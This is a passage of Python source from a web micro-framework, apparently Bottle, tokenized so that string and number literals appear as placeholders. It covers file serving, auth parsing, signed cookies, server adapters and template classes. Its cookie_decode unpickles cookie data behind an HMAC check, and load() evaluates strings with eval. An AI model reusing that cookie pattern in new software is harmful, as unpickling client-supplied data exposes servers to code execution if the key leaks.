) <EOL> if not os . path . exists ( filename ) or not os . path . isfile ( filename ) : <EOL> return HTTPError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> if not os . access ( filename , os . R_OK ) : <EOL> return HTTPError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> if mimetype == '<STR_LIT>' : <EOL> mimetype , encoding = mimetypes . guess_type ( filename ) <EOL> if mimetype : header [ '<STR_LIT:Content-Type>' ] = mimetype <EOL> if encoding : header [ '<STR_LIT>' ] = encoding <EOL> elif mimetype : <EOL> header [ '<STR_LIT:Content-Type>' ] = mimetype <EOL> if download : <EOL> download = os . path . basename ( filename if download == True else download ) <EOL> header [ '<STR_LIT>' ] = '<STR_LIT>' % download <EOL> stats = os . stat ( filename ) <EOL> header [ '<STR_LIT>' ] = clen = stats . st_size <EOL> lm = time . strftime ( "<STR_LIT>" , time . gmtime ( stats . st_mtime ) ) <EOL> header [ '<STR_LIT>' ] = lm <EOL> ims = request . environ . get ( '<STR_LIT>' ) <EOL> if ims : <EOL> ims = parse_date ( ims . split ( "<STR_LIT:;>" ) [ <NUM_LIT:0> ] . strip ( ) ) <EOL> if ims is not None and ims >= int ( stats . st_mtime ) : <EOL> header [ '<STR_LIT>' ] = time . strftime ( "<STR_LIT>" , time . gmtime ( ) ) <EOL> return HTTPResponse ( status = <NUM_LIT> , header = header ) <EOL> body = '<STR_LIT>' if request . method == '<STR_LIT>' else open ( filename , '<STR_LIT:rb>' ) <EOL> header [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> ranges = request . environ . get ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in request . environ : <EOL> ranges = list ( parse_range_header ( request . environ [ '<STR_LIT>' ] , clen ) ) <EOL> if not ranges : <EOL> return HTTPError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> offset , end = ranges [ <NUM_LIT:0> ] <EOL> header [ "<STR_LIT>" ] = "<STR_LIT>" % ( offset , end - <NUM_LIT:1> , clen ) <EOL> header [ "<STR_LIT>" ] = str ( end - offset ) <EOL> if body : body = _file_iter_range ( body , offset , end - offset ) <EOL> return HTTPResponse ( body , header = header , status = <NUM_LIT> ) <EOL> return HTTPResponse ( body , header = header ) <EOL> def debug ( mode = True ) : <EOL> """<STR_LIT>""" <EOL> global DEBUG <EOL> DEBUG = bool ( mode ) <EOL> def parse_date ( ims ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ts = email . utils . parsedate_tz ( ims ) <EOL> return time . mktime ( ts [ : <NUM_LIT:8> ] + ( <NUM_LIT:0> , ) ) - ( ts [ <NUM_LIT:9> ] or <NUM_LIT:0> ) - time . timezone <EOL> except ( TypeError , ValueError , IndexError , OverflowError ) : <EOL> return None <EOL> def parse_auth ( header ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> method , data = header . split ( None , <NUM_LIT:1> ) <EOL> if method . lower ( ) == '<STR_LIT>' : <EOL> user , pwd = touni ( base64 . b64decode ( tob ( data ) ) ) . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> return user , pwd <EOL> except ( KeyError , ValueError ) : <EOL> return None <EOL> def parse_range_header ( header , maxlen = <NUM_LIT:0> ) : <EOL> '''<STR_LIT>''' <EOL> if not header or header [ : <NUM_LIT:6> ] != '<STR_LIT>' : return <EOL> ranges = [ r . split ( '<STR_LIT:->' , <NUM_LIT:1> ) for r in header [ <NUM_LIT:6> : ] . split ( '<STR_LIT:U+002C>' ) if '<STR_LIT:->' in r ] <EOL> for start , end in ranges : <EOL> try : <EOL> if not start : <EOL> start , end = max ( <NUM_LIT:0> , maxlen - int ( end ) ) , maxlen <EOL> elif not end : <EOL> start , end = int ( start ) , maxlen <EOL> else : <EOL> start , end = int ( start ) , min ( int ( end ) + <NUM_LIT:1> , maxlen ) <EOL> if <NUM_LIT:0> <= start < end <= maxlen : <EOL> yield start , end <EOL> except ValueError : <EOL> pass <EOL> def _lscmp ( a , b ) : <EOL> '''<STR_LIT>''' <EOL> return not sum ( <NUM_LIT:0> if x == y else <NUM_LIT:1> for x , y in zip ( a , b ) ) and len ( a ) == len ( b ) <EOL> def cookie_encode ( data , key ) : <EOL> '''<STR_LIT>''' <EOL> msg = base64 . b64encode ( pickle . dumps ( data , - <NUM_LIT:1> ) ) <EOL> sig = base64 . b64encode ( hmac . new ( tob ( key ) , msg ) . digest ( ) ) <EOL> return tob ( '<STR_LIT:!>' ) + sig + tob ( '<STR_LIT:?>' ) + msg <EOL> def cookie_decode ( data , key ) : <EOL> '''<STR_LIT>''' <EOL> data = tob ( data ) <EOL> if cookie_is_encoded ( data ) : <EOL> sig , msg = data . split ( tob ( '<STR_LIT:?>' ) , <NUM_LIT:1> ) <EOL> if _lscmp ( sig [ <NUM_LIT:1> : ] , base64 . b64encode ( hmac . new ( tob ( key ) , msg ) . digest ( ) ) ) : <EOL> return pickle . loads ( base64 . b64decode ( msg ) ) <EOL> return None <EOL> def cookie_is_encoded ( data ) : <EOL> '''<STR_LIT>''' <EOL> return bool ( data . startswith ( tob ( '<STR_LIT:!>' ) ) and tob ( '<STR_LIT:?>' ) in data ) <EOL> def html_escape ( string ) : <EOL> '''<STR_LIT>''' <EOL> return string . replace ( '<STR_LIT:&>' , '<STR_LIT>' ) . replace ( '<STR_LIT:<>' , '<STR_LIT>' ) . replace ( '<STR_LIT:>>' , '<STR_LIT>' ) . replace ( '<STR_LIT:">' , '<STR_LIT>' ) . replace ( "<STR_LIT:'>" , '<STR_LIT>' ) <EOL> def html_quote ( string ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' % html_escape ( string ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\r>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) <EOL> def yieldroutes ( func ) : <EOL> """<STR_LIT>""" <EOL> import inspect <EOL> path = '<STR_LIT:/>' + func . __name__ . replace ( '<STR_LIT>' , '<STR_LIT:/>' ) . lstrip ( '<STR_LIT:/>' ) <EOL> spec = inspect . getargspec ( func ) <EOL> argc = len ( spec [ <NUM_LIT:0> ] ) - len ( spec [ <NUM_LIT:3> ] or [ ] ) <EOL> path += ( '<STR_LIT>' * argc ) % tuple ( spec [ <NUM_LIT:0> ] [ : argc ] ) <EOL> yield path <EOL> for arg in spec [ <NUM_LIT:0> ] [ argc : ] : <EOL> path += '<STR_LIT>' % arg <EOL> yield path <EOL> def path_shift ( script_name , path_info , shift = <NUM_LIT:1> ) : <EOL> '''<STR_LIT>''' <EOL> if shift == <NUM_LIT:0> : return script_name , path_info <EOL> pathlist = path_info . strip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> scriptlist = script_name . strip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> if pathlist and pathlist [ <NUM_LIT:0> ] == '<STR_LIT>' : pathlist = [ ] <EOL> if scriptlist and scriptlist [ <NUM_LIT:0> ] == '<STR_LIT>' : scriptlist = [ ] <EOL> if shift > <NUM_LIT:0> and shift <= len ( pathlist ) : <EOL> moved = pathlist [ : shift ] <EOL> scriptlist = scriptlist + moved <EOL> pathlist = pathlist [ shift : ] <EOL> elif shift < <NUM_LIT:0> and shift >= - len ( scriptlist ) : <EOL> moved = scriptlist [ shift : ] <EOL> pathlist = moved + pathlist <EOL> scriptlist = scriptlist [ : shift ] <EOL> else : <EOL> empty = '<STR_LIT>' if shift < <NUM_LIT:0> else '<STR_LIT>' <EOL> raise AssertionError ( "<STR_LIT>" % empty ) <EOL> new_script_name = '<STR_LIT:/>' + '<STR_LIT:/>' . join ( scriptlist ) <EOL> new_path_info = '<STR_LIT:/>' + '<STR_LIT:/>' . join ( pathlist ) <EOL> if path_info . endswith ( '<STR_LIT:/>' ) and pathlist : new_path_info += '<STR_LIT:/>' <EOL> return new_script_name , new_path_info <EOL> def validate ( ** vkargs ) : <EOL> """<STR_LIT>""" <EOL> depr ( '<STR_LIT>' ) <EOL> def decorator ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( * args , ** kargs ) : <EOL> for key , value in vkargs . items ( ) : <EOL> if key not in kargs : <EOL> abort ( <NUM_LIT> , '<STR_LIT>' % key ) <EOL> try : <EOL> kargs [ key ] = value ( kargs [ key ] ) <EOL> except ValueError : <EOL> abort ( <NUM_LIT> , '<STR_LIT>' % key ) <EOL> return func ( * args , ** kargs ) <EOL> return wrapper <EOL> return decorator <EOL> def auth_basic ( check , realm = "<STR_LIT>" , text = "<STR_LIT>" ) : <EOL> '''<STR_LIT>''' <EOL> def decorator ( func ) : <EOL> def wrapper ( * a , ** ka ) : <EOL> user , password = request . auth or ( None , None ) <EOL> if user is None or not check ( user , password ) : <EOL> response . headers [ '<STR_LIT>' ] = '<STR_LIT>' % realm <EOL> return HTTPError ( <NUM_LIT> , text ) <EOL> return func ( * a , ** ka ) <EOL> return wrapper <EOL> return decorator <EOL> def make_default_app_wrapper ( name ) : <EOL> '''<STR_LIT>''' <EOL> @ functools . wraps ( getattr ( Bottle , name ) ) <EOL> def wrapper ( * a , ** ka ) : <EOL> return getattr ( app ( ) , name ) ( * a , ** ka ) <EOL> return wrapper <EOL> route = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> get = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> post = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> put = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> delete = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> error = make_default_app_wrapper ( '<STR_LIT:error>' ) <EOL> mount = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> hook = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> install = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> uninstall = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> url = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> class ServerAdapter ( object ) : <EOL> quiet = False <EOL> def __init__ ( self , host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> , ** config ) : <EOL> self . options = config <EOL> self . host = host <EOL> self . port = int ( port ) <EOL> def run ( self , handler ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> args = '<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' % ( k , repr ( v ) ) for k , v in self . options . items ( ) ] ) <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , args ) <EOL> class CGIServer ( ServerAdapter ) : <EOL> quiet = True <EOL> def run ( self , handler ) : <EOL> from wsgiref . handlers import CGIHandler <EOL> def fixed_environ ( environ , start_response ) : <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return handler ( environ , start_response ) <EOL> CGIHandler ( ) . run ( fixed_environ ) <EOL> class FlupFCGIServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> import flup . server . fcgi <EOL> self . options . setdefault ( '<STR_LIT>' , ( self . host , self . port ) ) <EOL> flup . server . fcgi . WSGIServer ( handler , ** self . options ) . run ( ) <EOL> class WSGIRefServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> from wsgiref . simple_server import make_server , WSGIRequestHandler <EOL> if self . quiet : <EOL> class QuietHandler ( WSGIRequestHandler ) : <EOL> def log_request ( * args , ** kw ) : pass <EOL> self . options [ '<STR_LIT>' ] = QuietHandler <EOL> srv = make_server ( self . host , self . port , handler , ** self . options ) <EOL> srv . serve_forever ( ) <EOL> class CherryPyServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> from cherrypy import wsgiserver <EOL> server = wsgiserver . CherryPyWSGIServer ( ( self . host , self . port ) , handler ) <EOL> try : <EOL> server . start ( ) <EOL> finally : <EOL> server . stop ( ) <EOL> class WaitressServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> from waitress import serve <EOL> serve ( handler , host = self . host , port = self . port ) <EOL> class PasteServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> from paste import httpserver <EOL> if not self . quiet : <EOL> from paste . translogger import TransLogger <EOL> handler = TransLogger ( handler ) <EOL> httpserver . serve ( handler , host = self . host , port = str ( self . port ) , <EOL> ** self . options ) <EOL> class MeinheldServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> from meinheld import server <EOL> server . listen ( ( self . host , self . port ) ) <EOL> server . run ( handler ) <EOL> class FapwsServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> import fapws . _evwsgi as evwsgi <EOL> from fapws import base , config <EOL> port = self . port <EOL> if float ( config . SERVER_IDENT [ - <NUM_LIT:2> : ] ) > <NUM_LIT> : <EOL> port = str ( port ) <EOL> evwsgi . start ( self . host , port ) <EOL> if '<STR_LIT>' in os . environ and not self . quiet : <EOL> _stderr ( "<STR_LIT>" ) <EOL> _stderr ( "<STR_LIT>" ) <EOL> evwsgi . set_base_module ( base ) <EOL> def app ( environ , start_response ) : <EOL> environ [ '<STR_LIT>' ] = False <EOL> return handler ( environ , start_response ) <EOL> evwsgi . wsgi_cb ( ( '<STR_LIT>' , app ) ) <EOL> evwsgi . run ( ) <EOL> class TornadoServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> import tornado . wsgi , tornado . httpserver , tornado . ioloop <EOL> container = tornado . wsgi . WSGIContainer ( handler ) <EOL> server = tornado . httpserver . HTTPServer ( container ) <EOL> server . listen ( port = self . port ) <EOL> tornado . ioloop . IOLoop . instance ( ) . start ( ) <EOL> class AppEngineServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> quiet = True <EOL> def run ( self , handler ) : <EOL> from google . appengine . ext . webapp import util <EOL> module = sys . modules . get ( '<STR_LIT:__main__>' ) <EOL> if module and not hasattr ( module , '<STR_LIT>' ) : <EOL> module . main = lambda : util . run_wsgi_app ( handler ) <EOL> util . run_wsgi_app ( handler ) <EOL> class TwistedServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from twisted . web import server , wsgi <EOL> from twisted . python . threadpool import ThreadPool <EOL> from twisted . internet import reactor <EOL> thread_pool = ThreadPool ( ) <EOL> thread_pool . start ( ) <EOL> reactor . addSystemEventTrigger ( '<STR_LIT>' , '<STR_LIT>' , thread_pool . stop ) <EOL> factory = server . Site ( wsgi . WSGIResource ( reactor , thread_pool , handler ) ) <EOL> reactor . listenTCP ( self . port , factory , interface = self . host ) <EOL> reactor . run ( ) <EOL> class DieselServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from diesel . protocols . wsgi import WSGIApplication <EOL> app = WSGIApplication ( handler , port = self . port ) <EOL> app . run ( ) <EOL> class GeventServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from gevent import wsgi as wsgi_fast , pywsgi , monkey , local <EOL> if self . options . get ( '<STR_LIT>' , True ) : <EOL> if not threading . local is local . local : monkey . patch_all ( ) <EOL> wsgi = wsgi_fast if self . options . get ( '<STR_LIT>' ) else pywsgi <EOL> log = None if self . quiet else '<STR_LIT:default>' <EOL> wsgi . WSGIServer ( ( self . host , self . port ) , handler , log = log ) . serve_forever ( ) <EOL> class GunicornServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from gunicorn . app . base import Application <EOL> config = { '<STR_LIT>' : "<STR_LIT>" % ( self . host , int ( self . port ) ) } <EOL> config . update ( self . options ) <EOL> class GunicornApplication ( Application ) : <EOL> def init ( self , parser , opts , args ) : <EOL> return config <EOL> def load ( self ) : <EOL> return handler <EOL> GunicornApplication ( ) . run ( ) <EOL> class EventletServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from eventlet import wsgi , listen <EOL> try : <EOL> wsgi . server ( listen ( ( self . host , self . port ) ) , handler , <EOL> log_output = ( not self . quiet ) ) <EOL> except TypeError : <EOL> wsgi . server ( listen ( ( self . host , self . port ) ) , handler ) <EOL> class RocketServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from rocket import Rocket <EOL> server = Rocket ( ( self . host , self . port ) , '<STR_LIT>' , { '<STR_LIT>' : handler } ) <EOL> server . start ( ) <EOL> class BjoernServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from bjoern import run <EOL> run ( handler , self . host , self . port ) <EOL> class AutoServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> adapters = [ WaitressServer , PasteServer , TwistedServer , CherryPyServer , WSGIRefServer ] <EOL> def run ( self , handler ) : <EOL> for sa in self . adapters : <EOL> try : <EOL> return sa ( self . host , self . port , ** self . options ) . run ( handler ) <EOL> except ImportError : <EOL> pass <EOL> server_names = { <EOL> '<STR_LIT>' : CGIServer , <EOL> '<STR_LIT>' : FlupFCGIServer , <EOL> '<STR_LIT>' : WSGIRefServer , <EOL> '<STR_LIT>' : WaitressServer , <EOL> '<STR_LIT>' : CherryPyServer , <EOL> '<STR_LIT>' : PasteServer , <EOL> '<STR_LIT>' : FapwsServer , <EOL> '<STR_LIT>' : TornadoServer , <EOL> '<STR_LIT>' : AppEngineServer , <EOL> '<STR_LIT>' : TwistedServer , <EOL> '<STR_LIT>' : DieselServer , <EOL> '<STR_LIT>' : MeinheldServer , <EOL> '<STR_LIT>' : GunicornServer , <EOL> '<STR_LIT>' : EventletServer , <EOL> '<STR_LIT>' : GeventServer , <EOL> '<STR_LIT>' : RocketServer , <EOL> '<STR_LIT>' : BjoernServer , <EOL> '<STR_LIT>' : AutoServer , <EOL> } <EOL> def load ( target , ** namespace ) : <EOL> """<STR_LIT>""" <EOL> module , target = target . split ( "<STR_LIT::>" , <NUM_LIT:1> ) if '<STR_LIT::>' in target else ( target , None ) <EOL> if module not in sys . modules : __import__ ( module ) <EOL> if not target : return sys . modules [ module ] <EOL> if target . isalnum ( ) : return getattr ( sys . modules [ module ] , target ) <EOL> package_name = module . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> namespace [ package_name ] = sys . modules [ package_name ] <EOL> return eval ( '<STR_LIT>' % ( module , target ) , namespace ) <EOL> def load_app ( target ) : <EOL> """<STR_LIT>""" <EOL> global NORUN ; NORUN , nr_old = True , NORUN <EOL> try : <EOL> tmp = default_app . push ( ) <EOL> rv = load ( target ) <EOL> return rv if callable ( rv ) else tmp <EOL> finally : <EOL> default_app . remove ( tmp ) <EOL> NORUN = nr_old <EOL> _debug = debug <EOL> def run ( app = None , server = '<STR_LIT>' , host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> , <EOL> interval = <NUM_LIT:1> , reloader = False , quiet = False , plugins = None , <EOL> debug = False , ** kargs ) : <EOL> """<STR_LIT>""" <EOL> if NORUN : return <EOL> if reloader and not os . environ . get ( '<STR_LIT>' ) : <EOL> try : <EOL> lockfile = None <EOL> fd , lockfile = tempfile . mkstemp ( prefix = '<STR_LIT>' , suffix = '<STR_LIT>' ) <EOL> os . close ( fd ) <EOL> while os . path . exists ( lockfile ) : <EOL> args = [ sys . executable ] + sys . argv <EOL> environ = os . environ . copy ( ) <EOL> environ [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> environ [ '<STR_LIT>' ] = lockfile <EOL> p = subprocess . Popen ( args , env = environ ) <EOL> while p . poll ( ) is None : <EOL> os . utime ( lockfile , None ) <EOL> time . sleep ( interval ) <EOL> if p . poll ( ) != <NUM_LIT:3> : <EOL> if os . path . exists ( lockfile ) : os . unlink ( lockfile ) <EOL> sys . exit ( p . poll ( ) ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> finally : <EOL> if os . path . exists ( lockfile ) : <EOL> os . unlink ( lockfile ) <EOL> return <EOL> try : <EOL> _debug ( debug ) <EOL> app = app or default_app ( ) <EOL> if isinstance ( app , basestring ) : <EOL> app = load_app ( app ) <EOL> if not callable ( app ) : <EOL> raise ValueError ( "<STR_LIT>" % app ) <EOL> for plugin in plugins or [ ] : <EOL> app . install ( plugin ) <EOL> if server in server_names : <EOL> server = server_names . get ( server ) <EOL> if isinstance ( server , basestring ) : <EOL> server = load ( server ) <EOL> if isinstance ( server , type ) : <EOL> server = server ( host = host , port = port , ** kargs ) <EOL> if not isinstance ( server , ServerAdapter ) : <EOL> raise ValueError ( "<STR_LIT>" % server ) <EOL> server . quiet = server . quiet or quiet <EOL> if not server . quiet : <EOL> _stderr ( "<STR_LIT>" % ( __version__ , repr ( server ) ) ) <EOL> _stderr ( "<STR_LIT>" % ( server . host , server . port ) ) <EOL> _stderr ( "<STR_LIT>" ) <EOL> if reloader : <EOL> lockfile = os . environ . get ( '<STR_LIT>' ) <EOL> bgcheck = FileCheckerThread ( lockfile , interval ) <EOL> with bgcheck : <EOL> server . run ( app ) <EOL> if bgcheck . status == '<STR_LIT>' : <EOL> sys . exit ( <NUM_LIT:3> ) <EOL> else : <EOL> server . run ( app ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> except ( SystemExit , MemoryError ) : <EOL> raise <EOL> except : <EOL> if not reloader : raise <EOL> if not getattr ( server , '<STR_LIT>' , quiet ) : <EOL> print_exc ( ) <EOL> time . sleep ( interval ) <EOL> sys . exit ( <NUM_LIT:3> ) <EOL> class FileCheckerThread ( threading . Thread ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , lockfile , interval ) : <EOL> threading . Thread . __init__ ( self ) <EOL> self . lockfile , self . interval = lockfile , interval <EOL> self . status = None <EOL> def run ( self ) : <EOL> exists = os . path . exists <EOL> mtime = lambda path : os . stat ( path ) . st_mtime <EOL> files = dict ( ) <EOL> for module in list ( sys . modules . values ( ) ) : <EOL> path = getattr ( module , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if path [ - <NUM_LIT:4> : ] in ( '<STR_LIT>' , '<STR_LIT>' ) : path = path [ : - <NUM_LIT:1> ] <EOL> if path and exists ( path ) : files [ path ] = mtime ( path ) <EOL> while not self . status : <EOL> if not exists ( self . lockfile ) or mtime ( self . lockfile ) < time . time ( ) - self . interval - <NUM_LIT:5> : <EOL> self . status = '<STR_LIT:error>' <EOL> thread . interrupt_main ( ) <EOL> for path , lmtime in list ( files . items ( ) ) : <EOL> if not exists ( path ) or mtime ( path ) > lmtime : <EOL> self . status = '<STR_LIT>' <EOL> thread . interrupt_main ( ) <EOL> break <EOL> time . sleep ( self . interval ) <EOL> def __enter__ ( self ) : <EOL> self . start ( ) <EOL> def __exit__ ( self , exc_type , exc_val , exc_tb ) : <EOL> if not self . status : self . status = '<STR_LIT>' <EOL> self . join ( ) <EOL> return exc_type is not None and issubclass ( exc_type , KeyboardInterrupt ) <EOL> class TemplateError ( HTTPError ) : <EOL> def __init__ ( self , message ) : <EOL> HTTPError . __init__ ( self , <NUM_LIT> , message ) <EOL> class BaseTemplate ( object ) : <EOL> """<STR_LIT>""" <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT:html>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> settings = { } <EOL> defaults = { } <EOL> def __init__ ( self , source = None , name = None , lookup = [ ] , encoding = '<STR_LIT:utf8>' , ** settings ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . source = source . read ( ) if hasattr ( source , '<STR_LIT>' ) else source <EOL> self . filename = source . filename if hasattr ( source , '<STR_LIT:filename>' ) else None <EOL> self . lookup = [ os . path . abspath ( x ) for x in lookup ] <EOL> self . encoding = encoding <EOL> self . settings = self . settings . copy ( ) <EOL> self . settings . update ( settings ) <EOL> if not self . source and self . name : <EOL> self . filename = self . search ( self . name , self . lookup ) <EOL> if not self . filename : <EOL> raise TemplateError ( '<STR_LIT>' % repr ( name ) ) <EOL> if not self . source and not self . filename : <EOL> raise TemplateError ( '<STR_LIT>' ) <EOL> self . prepare ( ** self . settings ) <EOL> @ classmethod <EOL> def search ( cls , name , lookup = [ ] ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isfile ( name ) : return name <EOL> for spath in lookup : <EOL> fname = os . path . join ( spath , name ) <EOL> if os . path . isfile ( fname ) : <EOL> return fname <EOL> for ext in cls . extensions : <EOL> if os . path . isfile ( '<STR_LIT>' % ( fname , ext ) ) : <EOL> return '<STR_LIT>' % ( fname , ext ) <EOL> @ classmethod <EOL> def global_config ( cls , key , * args ) : <EOL> '''<STR_LIT>''' <EOL> if args : <EOL> cls . settings = cls . settings . copy ( ) <EOL> cls . settings [ key ] = args [ <NUM_LIT:0> ] <EOL> else : <EOL> return cls . settings [ key ] <EOL> def prepare ( self , ** options ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def render ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class MakoTemplate ( BaseTemplate ) : <EOL> def prepare ( self , ** options ) : <EOL> from mako . template import Template <EOL> from mako . lookup import TemplateLookup <EOL> options . update ( { '<STR_LIT>' : self . encoding } ) <EOL> options . setdefault ( '<STR_LIT>' , bool ( DEBUG ) ) <EOL> lookup = TemplateLookup ( directories = self . lookup , ** options ) <EOL> if self . source : <EOL> self . tpl = Template ( self . source , lookup = lookup , ** options ) <EOL> else : <EOL> self . tpl = Template ( uri = self . name , filename = self . filename , lookup = lookup , ** options ) <EOL> def render ( self , * args , ** kwargs ) : <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> _defaults = self . defaults . copy ( ) <EOL> _defaults . update ( kwargs ) <EOL> return self . tpl . render ( ** _defaults ) <EOL> class CheetahTemplate ( BaseTemplate ) : <EOL> def prepare ( self , ** options ) : <EOL> from Cheetah . Template import Template <EOL> self . context = threading . local ( ) <EOL> self . context . vars = { } <EOL> options [ '<STR_LIT>' ] = [ self . context . vars ] <EOL> if self . source : <EOL> self . tpl = Template ( source = self . source , ** options ) <EOL> else : <EOL> self . tpl = Template ( file = self . filename , ** options ) <EOL> def render ( self , * args , ** kwargs ) : <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> self . context . vars . update ( self . defaults ) <EOL> self . context . vars . update ( kwargs ) <EOL> out = str ( self . tpl ) <EOL> self . context . vars . clear ( ) <EOL> return out <EOL> class Jinja2Template ( BaseTemplate ) : <EOL> def prepare ( self , filters = None , tests = None , ** kwargs ) : <EOL> from jinja2 import Environment , FunctionLoader <EOL> if '<STR_LIT>' in kwargs : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . env = Environment ( loader = FunctionLoader ( self . loader ) , ** kwargs ) <EOL> if filters : self . env . filters . update ( filters ) <EOL> if tests : self . env . tests . update ( tests ) <EOL> if self . source : <EOL> self . tpl = self . env . from_string ( self . source ) <EOL> else : <EOL> self . tpl = self . env . get_template ( self . filename ) <EOL> def render ( self , * args , ** kwargs ) : <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> _defaults = self . defaults . copy ( ) <EOL> _defaults . update ( kwargs ) <EOL> return self . tpl . render ( ** _defaults ) <EOL> def loader ( self , name ) : <EOL> fname = self . search ( name , self . lookup ) <EOL> if not fname : return <EOL> with open ( fname , "<STR_LIT:rb>" ) as f : <EOL> return f . read ( ) . decode ( self . encoding ) <EOL> class SimpleTALTemplate ( BaseTemplate ) : <EOL> '''<STR_LIT>''' <EOL> def prepare ( self , ** options ) : <EOL> depr ( '<STR_LIT>' '<STR_LIT>' ) <EOL> from simpletal import simpleTAL <EOL> if self . source : <EOL> self . tpl = simpleTAL . compileHTMLTemplate ( self . source ) <EOL> else : <EOL> with open ( self . filename , '<STR_LIT:rb>' ) as fp : <EOL> self . tpl = simpleTAL . compileHTMLTemplate ( tonat ( fp . read ( ) ) ) <EOL> def render ( self , * args , ** kwargs ) : <EOL> from simpletal import simpleTALES <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> context = simpleTALES . Context ( ) <EOL> for k , v in self . defaults . items ( ) : <EOL> context . addGlobal ( k , v ) <EOL> for k , v in kwargs . items ( ) : <EOL> context . addGlobal ( k , v ) <EOL> output = StringIO ( ) <EOL> self . tpl . expand ( context , output ) <EOL> return output . getvalue ( ) <EOL> class SimpleTemplate ( BaseTemplate ) : <EOL> blocks = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:class>' ) <EOL> dedent_blocks = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ lazy_attribute <EOL> def re_pytokens ( cls ) : <EOL> '''<STR_LIT>''' <EOL> return re . compile ( r'''<STR_LIT>''' , re . VERBOSE ) <EOL> def prepare ( self , escape_func = html_escape , noescape = False , ** kwargs ) : <EOL> self . cache = { } <EOL> enc = self . encoding <EOL> self . _str = lambda x : touni ( x , enc ) <EOL> self . _escape = lambda x : escape_func ( touni ( x , enc ) ) <EOL> if noescape : <EOL> self . _str , self . _escape = self . _escape , self . _str <EOL> @ classmethod <EOL> def split_comment ( cls , code ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:#>' not in code : return code <EOL> subf = lambda m : '<STR_LIT>' if m . group ( <NUM_LIT:0> ) [ <NUM_LIT:0> ] == '<STR_LIT:#>' else m . group ( <NUM_LIT:0> ) <EOL> return re . sub ( cls . re_pytokens , subf , code ) <EOL> @ cached_property <EOL> def co ( self ) : <EOL> return compile ( self . code , self . filename or '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ cached_property <EOL> def code ( self ) : <EOL> stack = [ ] <EOL> lineno = <NUM_LIT:0> <EOL> ptrbuffer = [ ] <EOL> 